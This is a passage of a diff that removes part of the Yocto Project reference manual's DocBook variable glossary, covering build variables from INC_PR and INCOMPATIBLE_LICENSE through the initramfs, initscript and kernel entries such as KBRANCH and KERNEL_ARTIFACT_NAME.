-                    the burden is on you to find all those recipes and
-                    be sure that they get changed to reflect the updated
-                    version of the recipe.
-                    In this scenario, it can get complicated when recipes
-                    that are used in many places and provide common functionality
-                    are upgraded to a new revision.
-                </para>
-
-                <para>
-                    A more efficient way of dealing with this situation is
-                    to set the <filename>INC_PR</filename> variable inside
-                    the <filename>include</filename> files that the recipes
-                    share and then expand the <filename>INC_PR</filename>
-                    variable within the recipes to help
-                    define the recipe revision.
-                </para>
-
-                <para>
-                    The following provides an example that shows how to use
-                    the <filename>INC_PR</filename> variable
-                    given a common <filename>include</filename> file that
-                    defines the variable.
-                    Once the variable is defined in the
-                    <filename>include</filename> file, you can use the
-                    variable to set the <filename>PR</filename> values in
-                    each recipe.
-                    You will notice that when you set a recipe's
-                    <filename>PR</filename> you can provide more granular
-                    revisioning by appending values to the
-                    <filename>INC_PR</filename> variable:
-                    <literallayout class='monospaced'>
-     recipes-graphics/xorg-font/xorg-font-common.inc:INC_PR = "r2"
-     recipes-graphics/xorg-font/encodings_1.0.4.bb:PR = "${INC_PR}.1"
-     recipes-graphics/xorg-font/font-util_1.3.0.bb:PR = "${INC_PR}.0"
-     recipes-graphics/xorg-font/font-alias_1.0.3.bb:PR = "${INC_PR}.3"
-                    </literallayout>
-                    The first line of the example establishes the baseline
-                    revision to be used for all recipes that use the
-                    <filename>include</filename> file.
-                    The remaining lines in the example are from individual
-                    recipes and show how the <filename>PR</filename> value
-                    is set.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-INCOMPATIBLE_LICENSE'><glossterm>INCOMPATIBLE_LICENSE</glossterm>
-            <info>
-                INCOMPATIBLE_LICENSE[doc] = "Specifies a space-separated list of license names (as they would appear in LICENSE) that should be excluded from the build."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a space-separated list of license names
-                    (as they would appear in
-                    <link linkend='var-LICENSE'><filename>LICENSE</filename></link>)
-                    that should be excluded from the build.
-                    Recipes that provide no alternatives to listed incompatible
-                    licenses are not built.
-                    Packages that are individually licensed with the specified
-                    incompatible licenses will be deleted.
-                </para>
-
-                <note>
-                    This functionality is only regularly tested using
-                    the following setting:
-                    <literallayout class='monospaced'>
-     INCOMPATIBLE_LICENSE = "GPL-3.0 LGPL-3.0 AGPL-3.0"
-                    </literallayout>
-                    Although you can use other settings, you might be required
-                    to remove dependencies on or provide alternatives to
-                    components that are required to produce a functional system
-                    image.
-                </note>
-
-                <note><title>Tips</title>
-                    It is possible to define a list of licenses that are allowed
-                    to be used instead of the licenses that are excluded. To do
-                    this, define a
-                    variable <filename>COMPATIBLE_LICENSES</filename> with the
-                    names of the licences that are allowed. Then
-                    define <filename>INCOMPATIBLE_LICENSE</filename> as:
-                    <literallayout class='monospaced'>
-     INCOMPATIBLE_LICENSE = "${@' '.join(sorted(set(d.getVar('AVAILABLE_LICENSES').split()) - set(d.getVar('COMPATIBLE_LICENSES').split())))}"
-                    </literallayout>
-                    This will result
-                    in <filename>INCOMPATIBLE_LICENSE</filename> containing the
-                    names of all licences
-                    from <link linkend='var-AVAILABLE_LICENSES'><filename>AVAILABLE_LICENSES</filename></link>
-                    except the ones specified
-                    in <filename>COMPATIBLE_LICENSES</filename>, thus only
-                    allowing the latter licences to be used.
-                </note>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-INHERIT'><glossterm>INHERIT</glossterm>
-            <info>
-                INHERIT[doc] = "Causes the named class or classes to be inherited globally."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Causes the named class or classes to be inherited globally.
-                    Anonymous functions in the class or classes
-                    are not executed for the
-                    base configuration and in each individual recipe.
-                    The OpenEmbedded build system ignores changes to
-                    <filename>INHERIT</filename> in individual recipes.
-                </para>
-
-                <para>
-                    For more information on <filename>INHERIT</filename>, see
-                    the
-                    "<ulink url="&YOCTO_DOCS_BB_URL;#inherit-configuration-directive"><filename>INHERIT</filename> Configuration Directive</ulink>"
-                    section in the Bitbake User Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-INHERIT_DISTRO'><glossterm>INHERIT_DISTRO</glossterm>
-            <info>
-                INHERIT_DISTRO[doc] = "Lists classes that will be inherited at the distribution level. It is unlikely that you want to edit this variable."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Lists classes that will be inherited at the
-                    distribution level.
-                    It is unlikely that you want to edit this variable.
-                </para>
-
-                <para>
-                    The default value of the variable is set as follows in the
-                    <filename>meta/conf/distro/defaultsetup.conf</filename>
-                    file:
-                    <literallayout class='monospaced'>
-     INHERIT_DISTRO ?= "debian devshell sstate license"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-INHIBIT_DEFAULT_DEPS'><glossterm>INHIBIT_DEFAULT_DEPS</glossterm>
-            <info>
-                INHIBIT_DEFAULT_DEPS[doc] = "Prevents the default dependencies, namely the C compiler and standard C library (libc), from being added to DEPENDS."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Prevents the default dependencies, namely the C compiler
-                    and standard C library (libc), from being added to
-                    <link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>.
-                    This variable is usually used within recipes that do not
-                    require any compilation using the C compiler.
-                </para>
-
-                <para>
-                    Set the variable to "1" to prevent the default dependencies
-                    from being added.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-INHIBIT_PACKAGE_DEBUG_SPLIT'><glossterm>INHIBIT_PACKAGE_DEBUG_SPLIT</glossterm>
-            <info>
-                INHIBIT_PACKAGE_DEBUG_SPLIT[doc] = "If set to "1", prevents the OpenEmbedded build system from splitting out debug information during packaging"
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Prevents the OpenEmbedded build system from splitting
-                    out debug information during packaging.
-                    By default, the build system splits out debugging
-                    information during the
-                    <link linkend='ref-tasks-package'><filename>do_package</filename></link>
-                    task.
-                    For more information on how debug information is split out,
-                    see the
-                    <link linkend='var-PACKAGE_DEBUG_SPLIT_STYLE'><filename>PACKAGE_DEBUG_SPLIT_STYLE</filename></link>
-                    variable.
-                </para>
-
-                <para>
-                    To prevent the build system from splitting out
-                    debug information during packaging, set the
-                    <filename>INHIBIT_PACKAGE_DEBUG_SPLIT</filename> variable
-                    as follows:
-                    <literallayout class='monospaced'>
-     INHIBIT_PACKAGE_DEBUG_SPLIT = "1"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-INHIBIT_PACKAGE_STRIP'><glossterm>INHIBIT_PACKAGE_STRIP</glossterm>
-            <info>
-                INHIBIT_PACKAGE_STRIP[doc] = "If set to "1", causes the build to not strip binaries in resulting packages."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    If set to "1", causes the build to not strip binaries in
-                    resulting packages and prevents the
-                    <filename>-dbg</filename> package from containing the
-                    source files.
-                </para>
-
-                <para>
-                     By default, the OpenEmbedded build system strips
-                     binaries and puts the debugging symbols into
-                     <filename>${</filename><link linkend='var-PN'><filename>PN</filename></link><filename>}-dbg</filename>.
-                     Consequently, you should not set
-                     <filename>INHIBIT_PACKAGE_STRIP</filename> when you plan
-                     to debug in general.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-INHIBIT_SYSROOT_STRIP'><glossterm>INHIBIT_SYSROOT_STRIP</glossterm>
-            <info>
-                INHIBIT_SYSROOT_STRIP[doc] = "If set to "1", causes the build to not strip binaries in the resulting sysroot."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    If set to "1", causes the build to not strip binaries in
-                    the resulting sysroot.
-                </para>
-
-                <para>
-                    By default, the OpenEmbedded build system strips
-                    binaries in the resulting sysroot.
-                    When you specifically set the
-                    <filename>INHIBIT_SYSROOT_STRIP</filename> variable to
-                    "1" in your recipe, you inhibit this stripping.
-                </para>
-
-                <para>
-                    If you want to use this variable, include the
-                    <link linkend='ref-classes-staging'><filename>staging</filename></link>
-                    class.
-                    This class uses a <filename>sys_strip()</filename>
-                    function to test for the variable and acts accordingly.
-                    <note>
-                        Use of the <filename>INHIBIT_SYSROOT_STRIP</filename>
-                        variable occurs in rare and special circumstances.
-                        For example, suppose you are building bare-metal
-                        firmware by using an external GCC toolchain.
-                        Furthermore, even if the toolchain's binaries are
-                        strippable, other files exist that are needed for the
-                        build that are not strippable.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-INITRAMFS_FSTYPES'><glossterm>INITRAMFS_FSTYPES</glossterm>
-            <info>
-                INITRAMFS_FSTYPES[doc] = "Defines the format for the output image of an initial RAM filesystem (initramfs), which is used during boot."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Defines the format for the output image of an initial
-                    RAM filesystem (initramfs), which is used during boot.
-                    Supported formats are the same as those supported by the
-                    <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>
-                    variable.
-                </para>
-
-                <para>
-                    The default value of this variable, which is set in the
-                    <filename>meta/conf/bitbake.conf</filename> configuration
-                    file in the
-                    <link linkend='source-directory'>Source Directory</link>,
-                    is "cpio.gz".
-                    The Linux kernel's initramfs mechanism, as opposed to the
-                    initial RAM filesystem
-                    <ulink url='https://en.wikipedia.org/wiki/Initrd'>initrd</ulink>
-                    mechanism, expects an optionally compressed cpio
-                    archive.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-INITRAMFS_IMAGE'><glossterm>INITRAMFS_IMAGE</glossterm>
-            <info>
-                INITRAMFS_IMAGE[doc] = "Specifies the PROVIDES name of an image recipe that is used to build an initial RAM filesystem (initramfs) image."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the
-                    <link linkend='var-PROVIDES'><filename>PROVIDES</filename></link>
-                    name of an image recipe that is used to build an initial
-                    RAM filesystem (initramfs) image.
-                    In other words, the <filename>INITRAMFS_IMAGE</filename>
-                    variable causes an additional recipe to be built as
-                    a dependency to whatever root filesystem recipe you
-                    might be using (e.g. <filename>core-image-sato</filename>).
-                    The initramfs image recipe you provide should set
-                    <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>
-                    to
-                    <link linkend='var-INITRAMFS_FSTYPES'><filename>INITRAMFS_FSTYPES</filename></link>.
-                </para>
-
-                <para>
-                    An initramfs image provides a temporary root filesystem
-                    used for early system initialization (e.g. loading of
-                    modules needed to locate and mount the "real" root
-                    filesystem).
-                    <note>
-                        See the <filename>meta/recipes-core/images/core-image-minimal-initramfs.bb</filename>
-                        recipe in the
-                        <link linkend='source-directory'>Source Directory</link>
-                        for an example initramfs recipe.
-                        To select this sample recipe as the one built
-                        to provide the initramfs image,
-                        set <filename>INITRAMFS_IMAGE</filename> to
-                        "core-image-minimal-initramfs".
-                    </note>
-                </para>
-
-                <para>
-                    You can also find more information by referencing the
-                    <filename>meta-poky/conf/local.conf.sample.extended</filename>
-                    configuration file in the Source Directory,
-                    the
-                    <link linkend='ref-classes-image'><filename>image</filename></link>
-                    class, and the
-                    <link linkend='ref-classes-kernel'><filename>kernel</filename></link>
-                    class to see how to use the
-                    <filename>INITRAMFS_IMAGE</filename> variable.
-                </para>
-
-                <para>
-                    If <filename>INITRAMFS_IMAGE</filename> is empty, which is
-                    the default, then no initramfs image is built.
-                </para>
-
-                <para>
-                    For more information, you can also see the
-                    <link linkend='var-INITRAMFS_IMAGE_BUNDLE'><filename>INITRAMFS_IMAGE_BUNDLE</filename></link>
-                    variable, which allows the generated image to be bundled
-                    inside the kernel image.
-                    Additionally, for information on creating an initramfs
-                    image, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#building-an-initramfs-image'>Building an Initial RAM Filesystem (initramfs) Image</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-INITRAMFS_IMAGE_BUNDLE'><glossterm>INITRAMFS_IMAGE_BUNDLE</glossterm>
-            <info>
-                INITRAMFS_IMAGE_BUNDLE[doc] = "Controls whether or not the image recipe specified by INITRAMFS_IMAGE is run through an extra pass (do_bundle_initramfs) during kernel compilation in order to build a single binary that contains both the kernel image and the initial RAM filesystem (initramfs)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Controls whether or not the image recipe specified by
-                    <link linkend='var-INITRAMFS_IMAGE'><filename>INITRAMFS_IMAGE</filename></link>
-                    is run through an extra pass
-                    (<link linkend='ref-tasks-bundle_initramfs'><filename>do_bundle_initramfs</filename></link>)
-                    during kernel compilation in order to build a single binary
-                    that contains both the kernel image and the initial RAM
-                    filesystem (initramfs) image.
-                    This makes use of the
-                    <link linkend='var-CONFIG_INITRAMFS_SOURCE'><filename>CONFIG_INITRAMFS_SOURCE</filename></link>
-                    kernel feature.
-                    <note>
-                        Using an extra compilation pass to bundle the initramfs
-                        avoids a circular dependency between the kernel recipe and
-                        the initramfs recipe should the initramfs include kernel
-                        modules.
-                        Should that be the case, the initramfs recipe depends on
-                        the kernel for the kernel modules, and the kernel depends
-                        on the initramfs recipe since the initramfs is bundled
-                        inside the kernel image.
-                    </note>
-                </para>
-
-                <para>
-                    The combined binary is deposited into the
-                    <filename>tmp/deploy</filename> directory, which is part
-                    of the
-                    <link linkend='build-directory'>Build Directory</link>.
-                </para>
-
-                <para>
-                    Setting the variable to "1" in a configuration file causes the
-                    OpenEmbedded build system to generate a kernel image with the
-                    initramfs specified in <filename>INITRAMFS_IMAGE</filename>
-                    bundled within:
-                    <literallayout class='monospaced'>
-     INITRAMFS_IMAGE_BUNDLE = "1"
-                    </literallayout>
-                    By default, the
-                    <link linkend='ref-classes-kernel'><filename>kernel</filename></link>
-                    class sets this variable to a null string as follows:
-                    <literallayout class='monospaced'>
-     INITRAMFS_IMAGE_BUNDLE ?= ""
-                    </literallayout>
-                    <note>
-                        You must set the
-                        <filename>INITRAMFS_IMAGE_BUNDLE</filename> variable in
-                        a configuration file.
-                        You cannot set the variable in a recipe file.
-                    </note>
-                    See the
-                    <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta-poky/conf/local.conf.sample.extended'><filename>local.conf.sample.extended</filename></ulink>
-                    file for additional information.
-                    Also, for information on creating an initramfs, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#building-an-initramfs-image'>Building an Initial RAM Filesystem (initramfs) Image</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-INITRAMFS_LINK_NAME'><glossterm>INITRAMFS_LINK_NAME</glossterm>
-            <info>
-                INITRAMFS_LINK_NAME[doc] = "The link name of the initial RAM filesystem image."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The link name of the initial RAM filesystem image.
-                    This variable is set in the
-                    <filename>meta/classes/kernel-artifact-names.bbclass</filename>
-                    file as follows:
-                    <literallayout class='monospaced'>
-     INITRAMFS_LINK_NAME ?= "initramfs-${KERNEL_ARTIFACT_LINK_NAME}"
-                    </literallayout>
-                    The value of the <filename>KERNEL_ARTIFACT_LINK_NAME</filename>
-                    variable, which is set in the same file, has the following
-                    value:
-                    <literallayout class='monospaced'>
-     KERNEL_ARTIFACT_LINK_NAME ?= "${MACHINE}"
-                    </literallayout>
-                </para>
-
-                <para>
-                    See the
-                    <link linkend='var-MACHINE'><filename>MACHINE</filename></link>
-                    variable for additional information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-INITRAMFS_NAME'><glossterm>INITRAMFS_NAME</glossterm>
-            <info>
-                INITRAMFS_NAME[doc] = "The base name of the initial RAM filesystem image."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The base name of the initial RAM filesystem image.
-                    This variable is set in the
-                    <filename>meta/classes/kernel-artifact-names.bbclass</filename>
-                    file as follows:
-                    <literallayout class='monospaced'>
-     INITRAMFS_NAME ?= "initramfs-${KERNEL_ARTIFACT_NAME}"
-                    </literallayout>
-                    The value of the
-                    <link linkend='var-KERNEL_ARTIFACT_NAME'><filename>KERNEL_ARTIFACT_NAME</filename></link>
-                    variable, which is set in the same file, has the following
-                    value:
-                    <literallayout class='monospaced'>
-     KERNEL_ARTIFACT_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-INITRD'><glossterm>INITRD</glossterm>
-            <info>
-                INITRD[doc] = "Indicates a list of filesystem images to concatenate and use as an initial RAM disk (initrd)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Indicates list of filesystem images to concatenate and use
-                    as an initial RAM disk (<filename>initrd</filename>).
-                </para>
-
-                <para>
-                    The <filename>INITRD</filename> variable is an optional
-                    variable used with the
-                    <link linkend='ref-classes-image-live'><filename>image-live</filename></link>
-                    class.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-INITRD_IMAGE'><glossterm>INITRD_IMAGE</glossterm>
-            <info>
-                INITRD_IMAGE[doc] = "When building a "live" bootable image (i.e. when IMAGE_FSTYPES contains "live"), INITRD_IMAGE specifies the image recipe that should be built to provide the initial RAM disk image."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When building a "live" bootable image (i.e. when
-                    <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>
-                    contains "live"), <filename>INITRD_IMAGE</filename>
-                    specifies the image recipe that should be built
-                    to provide the initial RAM disk image.
-                    The default value is "core-image-minimal-initramfs".
-                </para>
-
-                <para>
-                    See the
-                    <link linkend='ref-classes-image-live'><filename>image-live</filename></link>
-                    class for more information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-INITSCRIPT_NAME'><glossterm>INITSCRIPT_NAME</glossterm>
-            <info>
-                INITSCRIPT_NAME[doc] = "The filename of the initialization script as installed to ${sysconfdir}/init.d."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The filename of the initialization script as installed to
-                    <filename>${sysconfdir}/init.d</filename>.
-                </para>
-
-                <para>
-                    This variable is used in recipes when using <filename>update-rc.d.bbclass</filename>.
-                    The variable is mandatory.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-INITSCRIPT_PACKAGES'><glossterm>INITSCRIPT_PACKAGES</glossterm>
-            <info>
-                INITSCRIPT_PACKAGES[doc] = "A list of the packages that contain initscripts. This variable is used in recipes when using update-rc.d.bbclass. The variable is optional and defaults to the PN variable."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of the packages that contain initscripts.
-                    If multiple packages are specified, you need to append the package name
-                    to the other <filename>INITSCRIPT_*</filename> as an override.
-                 </para>
-
-                 <para>
-                    This variable is used in recipes when using <filename>update-rc.d.bbclass</filename>.
-                    The variable is optional and defaults to the
-                    <link linkend='var-PN'><filename>PN</filename></link> variable.
-                </para>
-           </glossdef>
-        </glossentry>
-
-        <glossentry id='var-INITSCRIPT_PARAMS'><glossterm>INITSCRIPT_PARAMS</glossterm>
-            <info>
-                INITSCRIPT_PARAMS[doc] = "Specifies the options to pass to update-rc.d. The variable is mandatory and is used in recipes when using update-rc.d.bbclass."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the options to pass to <filename>update-rc.d</filename>.
-                    Here is an example:
-                    <literallayout class='monospaced'>
-     INITSCRIPT_PARAMS = "start 99 5 2 . stop 20 0 1 6 ."
-                    </literallayout>
-                </para>
-
-                <para>
-                    In this example, the script has a runlevel of 99,
-                    starts the script in initlevels 2 and 5, and
-                    stops the script in levels 0, 1 and 6.
-                </para>
-
-                <para>
-                    The variable's default value is "defaults", which is
-                    set in the
-                    <link linkend='ref-classes-update-rc.d'><filename>update-rc.d</filename></link>
-                    class.
-                </para>
-
-                <para>
-                    The value in
-                    <filename>INITSCRIPT_PARAMS</filename> is passed through
-                    to the <filename>update-rc.d</filename> command.
-                    For more information on valid parameters, please see the
-                    <filename>update-rc.d</filename> manual page at
-                    <ulink url='http://www.tin.org/bin/man.cgi?section=8&amp;topic=update-rc.d'></ulink>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-INSANE_SKIP'><glossterm>INSANE_SKIP</glossterm>
-            <info>
-                INSANE_SKIP[doc] = "Specifies the QA checks to skip for a specific package within a recipe."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the QA checks to skip for a specific package
-                    within a recipe.
-                    For example, to skip the check for symbolic link
-                    <filename>.so</filename> files in the main package of a
-                    recipe, add the following to the recipe.
-                    The package name override must be used, which in this
-                    example is <filename>${PN}</filename>:
-                    <literallayout class='monospaced'>
-     INSANE_SKIP_${PN} += "dev-so"
-                    </literallayout>
-                </para>
-
-                <para>
-                    See the "<link linkend='ref-classes-insane'><filename>insane.bbclass</filename></link>"
-                    section for a list of the valid QA checks you can
-                    specify using this variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-INSTALL_TIMEZONE_FILE'><glossterm>INSTALL_TIMEZONE_FILE</glossterm>
-            <info>
-                INSTALL_TIMEZONE_FILE[doc] = "Enables installation of the /etc/timezone file."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    By default, the <filename>tzdata</filename> recipe packages
-                    an <filename>/etc/timezone</filename> file.
-                    Set the <filename>INSTALL_TIMEZONE_FILE</filename>
-                    variable to "0" at the configuration level to disable this
-                    behavior.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-IPK_FEED_URIS'><glossterm>IPK_FEED_URIS</glossterm>
-            <info>
-                IPK_FEED_URIS[doc] = "List of ipkg feed records to put into generated image."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When the IPK backend is in use and package management
-                    is enabled on the target, you can use this variable to
-                    set up <filename>opkg</filename> in the target image
-                    to point to package feeds on a nominated server.
-                    Once the feed is established, you can perform
-                    installations or upgrades using the package manager
-                    at runtime.
-                </para>
-            </glossdef>
-        </glossentry>
-
-<!--
-        <glossentry id='var-INTERCEPT_DIR'><glossterm>INTERCEPT_DIR</glossterm>
-            <glossdef>
-                <para>
-                    An environment variable that defines the directory where
-                    post installation hooks are installed for the
-                    post install environment.
-                    This variable is fixed as follows:
-                    <literallayout class='monospaced'>
-     ${WORKDIR}/intercept_scripts
-                    </literallayout>
-                </para>
-
-                <para>
-                    After installation of a target's root filesystem,
-                    post installation scripts, which are essentially bash scripts,
-                    are all executed just a single time.
-                    Limiting execution of these scripts minimizes installation
-                    time that would be lengthened due to  certain packages
-                    triggering redundant operations.
-                    For example, consider the installation of font packages
-                    as a common example.
-                    Without limiting the execution of post installation scripts,
-                    all font directories would be rescanned to create the
-                    cache after each individual font package was installed.
-                </para>
-
-                <para>
-                    Do not edit the <filename>INTERCEPT_DIR</filename>
-                    variable.
-                </para>
-            </glossdef>
-        </glossentry>
--->
-
-    </glossdiv>
-
-<!--            <glossdiv id='var-glossary-j'><title>J</title>-->
-<!--            </glossdiv>-->
-
-   <glossdiv id='var-glossary-k'><title>K</title>
-
-        <glossentry id='var-KARCH'><glossterm>KARCH</glossterm>
-            <info>
-                KARCH[doc] = "Defines the kernel architecture used when assembling the configuration. You define the KARCH variable in the BSP Descriptions."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Defines the kernel architecture used when assembling
-                    the configuration.
-                    Architectures supported for this release are:
-                    <literallayout class='monospaced'>
-     powerpc
-     i386
-     x86_64
-     arm
-     qemu
-     mips
-                    </literallayout>
-                </para>
-
-                <para>
-                    You define the <filename>KARCH</filename> variable in the
-                    <ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#bsp-descriptions'>BSP Descriptions</ulink>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-KBRANCH'><glossterm>KBRANCH</glossterm>
-            <info>
-                KBRANCH[doc] = "A regular expression used by the build process to explicitly identify the kernel branch that is validated, patched, and configured during a build."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A regular expression used by the build process to explicitly
-                    identify the kernel branch that is validated, patched,
-                    and configured during a build.
-                    You must set this variable to ensure the exact kernel
-                    branch you want is being used by the build process.
-                </para>
-
-                <para>
-                    Values for this variable are set in the kernel's recipe
-                    file and the kernel's append file.
-                    For example, if you are using the
-                    <filename>linux-yocto_4.12</filename> kernel, the kernel
-                    recipe file is the
-                    <filename>meta/recipes-kernel/linux/linux-yocto_4.12.bb</filename>
-                    file.
-                    <filename>KBRANCH</filename> is set as follows in that
-                    kernel recipe file:
-                    <literallayout class='monospaced'>
-     KBRANCH ?= "standard/base"
-                    </literallayout>
-                </para>
-
-                <para>
-                    This variable is also used from the kernel's append file
-                    to identify the kernel branch specific to a particular
-                    machine or target hardware.
-                    Continuing with the previous kernel example, the kernel's
-                    append file (i.e.
-                    <filename>linux-yocto_4.12.bbappend</filename>) is located
-                    in the BSP layer for a given machine.
-                    For example, the append file for the Beaglebone,
-                    EdgeRouter, and generic versions of both 32 and 64-bit IA
-                    machines (<filename>meta-yocto-bsp</filename>) is named
-                    <filename>meta-yocto-bsp/recipes-kernel/linux/linux-yocto_4.12.bbappend</filename>.
-                    Here are the related statements from that append file:
-                    <literallayout class='monospaced'>
-     KBRANCH_genericx86  = "standard/base"
-     KBRANCH_genericx86-64  = "standard/base"
-     KBRANCH_edgerouter = "standard/edgerouter"
-     KBRANCH_beaglebone = "standard/beaglebone"
-                    </literallayout>
-                        The <filename>KBRANCH</filename> statements identify
-                        the kernel branch to use when building for each
-                        supported BSP.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-KBUILD_DEFCONFIG'><glossterm>KBUILD_DEFCONFIG</glossterm>
-            <info>
-                KBUILD_DEFCONFIG[doc] = "Specifies an "in-tree" kernel configuration file for use during a kernel build."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When used with the
-                    <link linkend='ref-classes-kernel-yocto'><filename>kernel-yocto</filename></link>
-                    class, specifies an "in-tree" kernel configuration file
-                    for use during a kernel build.
-                </para>
-
-                <para>
-                    Typically, when using a <filename>defconfig</filename> to
-                    configure a kernel during a build, you place the
-                    file in your layer in the same manner as you would
-                    place patch files and configuration fragment files (i.e.
-                    "out-of-tree").
-                    However, if you want to use a <filename>defconfig</filename>
-                    file that is part of the kernel tree (i.e. "in-tree"),
-                    you can use the
-                    <filename>KBUILD_DEFCONFIG</filename> variable and append
-                    the
-                    <link linkend='var-KMACHINE'><filename>KMACHINE</filename></link>
-                    variable to point to the <filename>defconfig</filename>
-                    file.
-                </para>
-
-                <para>
-                    To use the variable, set it in the append file for your
-                    kernel recipe using the following form:
-                    <literallayout class='monospaced'>
-     KBUILD_DEFCONFIG_<replaceable>KMACHINE</replaceable> ?= <replaceable>defconfig_file</replaceable>
-                    </literallayout>
-                    Here is an example from a "raspberrypi2"
-                    <filename>KMACHINE</filename> build that uses a
-                    <filename>defconfig</filename> file named
-                    "bcm2709_defconfig":
-                    <literallayout class='monospaced'>
-     KBUILD_DEFCONFIG_raspberrypi2 = "bcm2709_defconfig"
-                    </literallayout>
-                    As an alternative, you can use the following within your
-                    append file:
-                    <literallayout class='monospaced'>
-     KBUILD_DEFCONFIG_pn-linux-yocto ?= <replaceable>defconfig_file</replaceable>
-                    </literallayout>
-                    For more information on how to use the
-                    <filename>KBUILD_DEFCONFIG</filename> variable, see the
-                    "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#using-an-in-tree-defconfig-file'>Using an "In-Tree" <filename>defconfig</filename> File</ulink>"
-                    section in the Yocto Project Linux Kernel Development
-                    Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-KERNEL_ALT_IMAGETYPE'><glossterm>KERNEL_ALT_IMAGETYPE</glossterm>
-            <info>
-                KERNEL_ALT_IMAGETYPE[doc] = "Specifies an alternate kernel image type for creation."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies an alternate kernel image type for creation in
-                    addition to the kernel image type specified using the
-                    <link linkend='var-KERNEL_IMAGETYPE'><filename>KERNEL_IMAGETYPE</filename></link>
-                    variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-KERNEL_ARTIFACT_NAME'><glossterm>KERNEL_ARTIFACT_NAME</glossterm>
-            <info>
-                KERNEL_ARTIFACT_NAME[doc] = "Specifies the name of all of the build artifacts."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the name of all of the build artifacts.
-                    You can change the name of the artifacts by changing the
-                    <filename>KERNEL_ARTIFACT_NAME</filename> variable.
-                </para>
-
-                <para>
-                    The value of <filename>KERNEL_ARTIFACT_NAME</filename>,
-                    which is set in the
-                    <filename> meta/classes/kernel-artifact-names.bbclass</filename>
-                    file, has the following default value:
-                    <literallayout class='monospaced'>
-     KERNEL_ARTIFACT_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
-                    </literallayout>
-                </para>
-
-                <para>
-                    See the
-                    <link linkend='var-PKGE'><filename>PKGE</filename></link>,
-                    <link linkend='var-PKGV'><filename>PKGV</filename></link>,
-                    <link linkend='var-PKGR'><filename>PKGR</filename></link>,
-                    and
-                    <link linkend='var-MACHINE'><filename>MACHINE</filename></link>
-                    variables for additional information.
-                    <note>
-                        The <filename>IMAGE_VERSION_SUFFIX</filename> variable
-                        is set to
-                        <link linkend='var-DATETIME'><filename>DATETIME</filename></link>.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-KERNEL_CLASSES'><glossterm>KERNEL_CLASSES</glossterm>
-            <info>
